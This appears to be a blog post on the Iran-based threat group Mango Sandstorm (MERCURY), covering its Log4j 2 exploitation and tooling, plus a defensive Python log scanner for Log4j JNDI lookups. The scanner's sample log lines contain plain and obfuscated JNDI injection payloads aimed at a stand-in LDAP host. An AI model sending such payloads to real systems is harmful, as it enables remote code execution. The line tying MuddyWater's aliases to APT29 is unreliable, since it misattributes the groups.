While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response.
| # | Title | About |
|---|---|---|
| Part 1 | Day4-Mango-Sandstorm-Part1-Overview.md (we are here!) | Mango Sandstorm overview |
| Part 2 | Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md | August 25, 2022, Mango Sandstorm |
| Part 3 | Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md | April 7, 2023, Mango Sandstorm & Storm-1084 |
Mango Sandstorm, formerly known as MERCURY, is an Iran-based cyber activity group that focuses on gathering sensitive data through targeted intrusions rather than on financial gain. Its attack techniques include spear-phishing, exploitation of known vulnerabilities, malware, and social engineering.
For more detailed insight, Microsoft Defender Threat Intelligence also covers Mango Sandstorm's description, TTPs, and IOCs.
Mango Sandstorm, Microsoft Defender Threat Intelligence
Mango Sandstorm, previously known for using Log4j 2 exploits against VMware applications, has more recently targeted SysAid applications with the same technique. Once the group gains initial access, it establishes persistence, moves laterally within the network using both custom and well-known hacking tools, and dumps credentials.
Mango Sandstorm, previously known for Log4j 2 exploitation and for targeting on-premises environments, has since expanded its focus to both on-premises and cloud environments. After initial access is gained through known vulnerabilities, the rest of the attack has been linked to Storm-1084 (formerly known as DEV-1084).
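As an added example that is not part of the original post or of Microsoft's reporting: the Log4j 2 JNDI lookup strings behind this class of exploit arrive in HTTP request fields such as the User-Agent or query string, and they are often obfuscated with nested lookups or URL-encoding. The Python scanner below normalizes those obfuscations before matching, so a defender reviewing web or application logs can triage suspected exploitation attempts and see which source addresses and JNDI schemes were involved. The log lines, IP addresses and hostnames are constructed for the example and are assumptions.

```python
import re
import urllib.parse

# Constructed sample access-log lines in combined log format (not from the original post).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [25/Aug/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Aug/2022:10:01:07 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [25/Aug/2022:10:01:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.8"',
    '10.0.0.12 - - [25/Aug/2022:10:01:11 +0000] "POST /api HTTP/1.1" 200 20 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/c}"',
    '10.0.0.3 - - [25/Aug/2022:10:01:15 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.24"',
]

# Inner lookups that Log4j 2 resolves before the JNDI lookup itself runs:
#   ${lower:X} / ${upper:X}  -> case-folded X
#   ${::-X}                  -> default-value syntax that evaluates to X
_INNER_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)

# What we alert on once the text is normalized: ${jndi:<scheme>:...}
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Replace one inner lookup with the literal text it would evaluate to."""
    if match.group(1):  # ${lower:...} or ${upper:...}
        if match.group(1).lower() == "lower":
            return match.group(2).lower()
        return match.group(2).upper()
    return match.group(3)  # ${::-...}


def normalize(text):
    """URL-decode, then collapse nested lookups until nothing more changes."""
    text = urllib.parse.unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _INNER_LOOKUP_RE.sub(_resolve_inner, text)
    return text


def scan_log_lines(lines):
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        match = _JNDI_RE.search(normalized)
        if match:
            findings.append({
                "line": number,
                "source_ip": raw.split(" ", 1)[0],  # first field of combined log format
                "scheme": match.group(1).lower(),
                "evidence": normalized[match.start():match.start() + 60],
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['source_ip']} sent a "
              f"{finding['scheme']} JNDI lookup: {finding['evidence']}")
```

Normalizing before matching is the important design choice: a plain substring search for `${jndi:` misses the nested-lookup and URL-encoded variants in lines 3 and 4, while the fixed-point loop resolves them to the same canonical string as line 2. The scanner reports only that a lookup string was received; whether the application actually resolved it has to be confirmed from the application's own logs or outbound LDAP/RMI/DNS traffic.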
There are several groups associated with APT29, and each group uses different attack techniques.
- Earth Vetala
- Mango Sandstorm (MERCURY)
- Static Kitten
- Seedworm
- TEMP.Zagros
- MuddyWater

- Spear-phishing email
- Use of cloud file-sharing services
- Use of commercial remote access applications
- Tooling: Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs
- Exploiting vulnerabilities
- Social engineering
- Watering hole attacks
- Backdoor installation
- Lateral movement
MuddyWater, Techniques Used, ATT&CK® Navigator
- August 25, 2022, MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations
- April 7, 2023, MERCURY and DEV-1084: Destructive attack on hybrid environment
- What is Microsoft Defender Threat Intelligence (Defender TI)?
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.